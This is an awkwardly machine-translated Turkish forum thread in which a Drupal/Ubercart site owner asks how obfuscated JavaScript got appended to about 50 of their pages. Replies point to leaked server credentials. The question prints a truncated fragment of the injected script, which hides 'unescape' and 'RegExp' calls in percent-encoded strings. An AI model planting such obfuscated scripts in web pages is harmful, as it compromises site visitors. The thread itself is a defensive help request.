Javascript Yandaki sunucu üzerinde web sayfalarına eklendi

2 Cevap php

Benim web sayfaları (özellikle index.php, ana.html, include.inc) benim özgün kodundan sonra çok altında javascript kodları bir parça ile enjekte edildiğini öğrendim.

<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"

Mümkün (enfekte bunlardan 50 gibi) SQL Injection web sayfalarına js kod yığın eklemek için mi? Ya da sunucunun kendisinde bir virüstür?

Ben oldukça az formları girişli Drupal + Ubercart kullanıyorum.

2 Cevap

files modifiye edilmiş olduğundan, SQL enjeksiyon olması pek mümkün değildir. Diğer bazı güvenlik kusur bir ftp / ssh / etc hesabı için sunucu veya kimlik bilgilerine oralarda ya sızdı.

Ne platformu, tarayıcı?

Tüm web sayfaları veya sadece belirli bir sunucudan olanlara görüyor musunuz?

Bazıları "güvenlik duvarları" gelen sayfalara Javascript ekleyin.